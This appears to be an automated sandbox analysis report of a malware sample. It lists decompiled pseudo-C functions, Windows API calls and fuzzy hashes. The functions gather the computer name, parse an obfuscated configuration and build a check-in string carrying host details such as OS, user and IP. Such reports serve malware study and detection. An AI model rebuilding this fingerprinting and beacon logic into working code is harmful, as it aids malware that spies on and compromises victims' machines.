                                                          • Instruction ID: 4240a627f4e01659aa6f6363c714c7f86e2cf6628ac8f68cc3c455ad9fa1c1ea
                                                          • Opcode Fuzzy Hash: 61297296b42facfcf8f5126c0071739d54becee42d04f246c2ffa66857e7198f
                                                          • Instruction Fuzzy Hash: D4315C71500159AFCB11EF98CD88C9BBB7AFBC97407118A98F9159B311D632ED51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E047F58DB(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E047FA71F(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E047FA734(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}










                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,047F1FA0,74B5F710,00000000,?,?,047F1FA0), ref: 047F58F3
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,047F1FA0,047F1FA1,?,?,047F1FA0), ref: 047F5910
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 71f1ef8aeb596bac09d25eb53bc8972b83eb635b14b92de96e3a98327e48b3bc
                                                          • Instruction ID: dcbf4c8d4b13d19e43444f96085437228a85159ff1c60a429dfc6cc4d50a2f37
                                                          • Opcode Fuzzy Hash: 71f1ef8aeb596bac09d25eb53bc8972b83eb635b14b92de96e3a98327e48b3bc
                                                          • Instruction Fuzzy Hash: 19F05436600249BAEB11D79ACC04EAF77FDDBC5664F260059AA04E3741EA70EE019670
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x47fd23c) == 0) {
                                                          						E047F1B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x47fd23c) == 1) {
                                                          						_t10 = E047F12E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(047FD23C), ref: 047F4EDF
                                                            • Part of subcall function 047F12E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F12F8
                                                          • InterlockedDecrement.KERNEL32(047FD23C), ref: 047F4EFF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: cac5538ce97e558952256861e8be998191530f59074eb2987da82823c0ce7298
                                                          • Instruction ID: 153834e070e7a50b64e73c1c8e5b53fa00e29f6b54101bec4e4f1585150aa26c
                                                          • Opcode Fuzzy Hash: cac5538ce97e558952256861e8be998191530f59074eb2987da82823c0ce7298
                                                          • Instruction Fuzzy Hash: 93E04F21348135A7A7211EFC9E0CB5FA782EFA0B94F498414EB8BD1310D650F841A695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 34%
                                                          			E047F48F1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                          				intOrPtr _v12;
                                                          				void* _v18;
                                                          				char _v20;
                                                          				intOrPtr _t15;
                                                          				void* _t17;
                                                          				intOrPtr _t19;
                                                          				void* _t23;
                                                          
                                                          				_v20 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosw");
                                                          				_t15 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t4 = _t15 + 0x47fe39c; // 0x52e8944
                                                          				_t20 = _t4;
                                                          				_t6 = _t15 + 0x47fe124; // 0x650047
                                                          				_t17 = E047F219B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                          				if(_t17 < 0) {
                                                          					_t23 = _t17;
                                                          				} else {
                                                          					_t23 = 8;
                                                          					if(_v20 != _t23) {
                                                          						_t23 = 1;
                                                          					} else {
                                                          						_t19 = E047F2298(_t20, _v12);
                                                          						if(_t19 != 0) {
                                                          							 *_a16 = _t19;
                                                          							_t23 = 0;
                                                          						}
                                                          						__imp__#6(_v12);
                                                          					}
                                                          				}
                                                          				return _t23;
                                                          			}











                                                          APIs
                                                            • Part of subcall function 047F219B: SysFreeString.OLEAUT32(?), ref: 047F227A
                                                            • Part of subcall function 047F2298: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047F84CA,004F0053,00000000,?), ref: 047F22A1
                                                            • Part of subcall function 047F2298: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047F84CA,004F0053,00000000,?), ref: 047F22CB
                                                            • Part of subcall function 047F2298: memset.NTDLL ref: 047F22DF
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F4954
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 397948122-0
                                                          • Opcode ID: 29cc07b4c5bb7326206ec4a9ba55ab891d07980984d97745cc037fb1b5fe2cf2
                                                          • Instruction ID: 82235762c160db1316baa59b9072c868cd83f402285b062a266733107570eac6
                                                          • Opcode Fuzzy Hash: 29cc07b4c5bb7326206ec4a9ba55ab891d07980984d97745cc037fb1b5fe2cf2
                                                          • Instruction Fuzzy Hash: F8017C32600119BFDB11EFA9CC08DAFBBB9FB44750F008565EA05E7261E771E911C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F5356(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                          				void* _t21;
                                                          				void* _t22;
                                                          				signed int _t24;
                                                          				intOrPtr* _t26;
                                                          				void* _t27;
                                                          
                                                          				_t26 = __edi;
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					_t27 = E047F8BC1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                          					if(_t27 == 0) {
                                                          						_t24 = _a12 >> 1;
                                                          						if(_t24 == 0) {
                                                          							_t27 = 2;
                                                          							HeapFree( *0x47fd238, 0, _a4);
                                                          						} else {
                                                          							_t21 = _a4;
                                                          							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                          							 *_t26 = _t21;
                                                          						}
                                                          					}
                                                          					L6:
                                                          					return _t27;
                                                          				}
                                                          				_t22 = E047F48F1(_a4, _a8, _a12, __edi); // executed
                                                          				_t27 = _t22;
                                                          				if(_t27 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				goto L2;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 047F48F1: SysFreeString.OLEAUT32(00000000), ref: 047F4954
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,047F8D51,?,004F0053,052E9368,00000000,?), ref: 047F53B9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Free$HeapString
                                                          • String ID:
                                                          • API String ID: 3806048269-0
                                                          • Opcode ID: 7689cffb147fa9ba8bfd66f7d465806ac228148c9c46c21540762cc3dffe1852
                                                          • Instruction ID: 5c454100a4b4ac896972999593c5f86e4542beeb09a5733d80836e0230faddc7
                                                          • Opcode Fuzzy Hash: 7689cffb147fa9ba8bfd66f7d465806ac228148c9c46c21540762cc3dffe1852
                                                          • Instruction Fuzzy Hash: 90014B32501619BBDB229F98CC05EEE7BA5EF04790F448028FF059A321D771E960DBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E047F1AE2(intOrPtr* __edi) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t21;
                                                          
                                                          				_t21 = __edi;
                                                          				_push( &_v12);
                                                          				_push(__edi);
                                                          				_v8 = 0x1d4c0;
                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                          				while(1) {
                                                          					_v16 = _t15;
                                                          					Sleep(0x1f4); // executed
                                                          					if(_v12 == 4) {
                                                          						break;
                                                          					}
                                                          					if(_v8 == 0) {
                                                          						L4:
                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                          						continue;
                                                          					} else {
                                                          						if(_v8 <= 0x1f4) {
                                                          							_v16 = 0x80004004;
                                                          						} else {
                                                          							_v8 = _v8 - 0x1f4;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          					L8:
                                                          					return _v16;
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 047F1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 1e7fb99044ea1d8a981d230ee068bfbc24c5ef1b37c76bf4f4191fe5b5094188
                                                          • Instruction ID: bd4ac9cce1b8975440a21dad048d27b46788a0f93a8af069844ec3f97f05afa3
                                                          • Opcode Fuzzy Hash: 1e7fb99044ea1d8a981d230ee068bfbc24c5ef1b37c76bf4f4191fe5b5094188
                                                          • Instruction Fuzzy Hash: DBF0E775D11218EFDB01DB95C988AEDB7B8EF04305F5484AAE602A7340E7B46F84DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E047F888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x47fd2a4; // 0x63699bc3
                                                          				if(E047F7145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x47fd2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x47fd2a4; // 0x63699bc3
                                                          				if(E047F7145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x47fd2a4; // 0x63699bc3
                                                          				if(E047F7145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x47fd238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t43 = E047F6B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x47fd240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t44 = E047F6B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x47fd244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t45 = E047F6B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x47fd248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t46 = E047F6B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x47fd004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t47 = E047F6B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x47fd02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t48 = E047F6B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E047F56FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E047F6702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t49 = E047F6B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E047F56FA(0, _t49) != 0) {
                                                          						_t114 =  *0x47fd32c; // 0x52e95b0
                                                          						E047F23F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x47fd2a4; // 0x63699bc3
                                                          						_t50 = E047F6B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t20 = _t51 + 0x47fe252; // 0x616d692f
                                                          						 *0x47fd2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E047F56FA(0, _t50);
                                                          						 *0x47fd2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x47fd2a4; // 0x63699bc3
                                                          								_t53 = E047F6B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x47fd2a8; // 0xaea5a8
                                                          								_t21 = _t54 + 0x47fe791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E047F56FA(0, _t53);
                                                          							}
                                                          							 *0x47fd340 = _t55;
                                                          							HeapFree( *0x47fd238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}




































                                                          0x047f8a04
                                                          0x047f8a04
                                                          0x047f89ff
                                                          0x047f8a0b
                                                          0x047f8a21
                                                          0x047f8a0d
                                                          0x047f8a0d
                                                          0x047f8a1a
                                                          0x047f8a1a
                                                          0x047f8a25
                                                          0x047f8a27
                                                          0x047f8a2a
                                                          0x047f8a2b
                                                          0x047f8a32
                                                          0x047f8a34
                                                          0x047f8a35
                                                          0x047f8a35
                                                          0x047f8a32
                                                          0x047f8a3c
                                                          0x047f8a52
                                                          0x047f8a3e
                                                          0x047f8a3e
                                                          0x047f8a4b
                                                          0x047f8a4b
                                                          0x047f8a56
                                                          0x047f8a64
                                                          0x047f8a6e
                                                          0x047f8a6e
                                                          0x047f8a75
                                                          0x047f8a8b
                                                          0x047f8a77
                                                          0x047f8a77
                                                          0x047f8a84
                                                          0x047f8a84
                                                          0x047f8a8f
                                                          0x047f8aa2
                                                          0x047f8aa2
                                                          0x047f8aa7
                                                          0x047f8aad
                                                          0x00000000
                                                          0x047f8a91
                                                          0x047f8a94
                                                          0x047f8a99
                                                          0x047f8aa0
                                                          0x047f8ab2
                                                          0x047f8ab4
                                                          0x047f8aca
                                                          0x047f8ab6
                                                          0x047f8ab6
                                                          0x047f8ac3
                                                          0x047f8ac3
                                                          0x047f8ace
                                                          0x047f8ada
                                                          0x047f8adf
                                                          0x047f8adf
                                                          0x047f8ad0
                                                          0x047f8ad3
                                                          0x047f8ad3
                                                          0x047f8aed
                                                          0x047f8af2
                                                          0x047f8af8
                                                          0x00000000
                                                          0x047f8af8
                                                          0x00000000
                                                          0x047f8aa0
                                                          0x047f8a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F8933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F8965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F8997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F89C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008), ref: 047F89FB
                                                          • HeapFree.KERNEL32(00000000,047F5D25,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008,?,047F5D25), ref: 047F8AF2
                                                          • HeapFree.KERNEL32(00000000,?,047F5D25,?,63699BC3,?,047F5D25,63699BC3,?,047F5D25,63699BC3,00000005,047FD00C,00000008,?,047F5D25), ref: 047F8B05
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 5be47aad309171e3c34804277242102b75dfcac185975f4f1fae6d1a688cef94
                                                          • Instruction ID: 0d73ddc6c03753bbe77a251c99c07de9470bf8f945087a996ee1d250a8c0e858
                                                          • Opcode Fuzzy Hash: 5be47aad309171e3c34804277242102b75dfcac185975f4f1fae6d1a688cef94
                                                          • Instruction Fuzzy Hash: 91718E71A10105AFD721FBB9DE88D9B77EDEF483007258915A602D7304F735F9429762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E047F1F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x47fd018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x47fd014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x47fd010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E047FD00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t3 = _t30 + 0x47fe633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x47fd02c,  *0x47fd004, _t25);
                                                          				_t33 = E047F56CD();
                                                          				_t34 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t4 = _t34 + 0x47fe673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E047F58DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t6 = _t83 + 0x47fe8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x47fd238, 0, _t96);
                                                          				}
                                                          				_t97 = E047FA199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t8 = _t78 + 0x47fe8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x47fd238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x47fd32c; // 0x52e95b0
                                                          				_a32 = E047F4622(0x47fd00a, _t98 + 4);
                                                          				_t42 =  *0x47fd2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t11 = _t74 + 0x47fe8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x47fd2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t13 = _t71 + 0x47fe88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x47fd238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E047F518F(GetTickCount());
                                                          						_t50 =  *0x47fd32c; // 0x52e95b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x47fd32c; // 0x52e95b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x47fd32c; // 0x52e95b0
                                                          						_t103 = E047F1BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x47fc28c);
                                                          							_push(_t103);
                                                          							_t62 = E047F361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E047F6777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E047F6761();
                                                          								}
                                                          								HeapFree( *0x47fd238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x47fd238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x47fd238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x47fd238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x47fd238, 0, _t105);
                                                          				return _a12;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 047F1F2A
                                                          • wsprintfA.USER32 ref: 047F1F77
                                                          • wsprintfA.USER32 ref: 047F1F94
                                                          • wsprintfA.USER32 ref: 047F1FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F1FC7
                                                          • wsprintfA.USER32 ref: 047F1FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F1FF9
                                                          • wsprintfA.USER32 ref: 047F2030
                                                          • wsprintfA.USER32 ref: 047F2050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047F206D
                                                          • GetTickCount.KERNEL32 ref: 047F207D
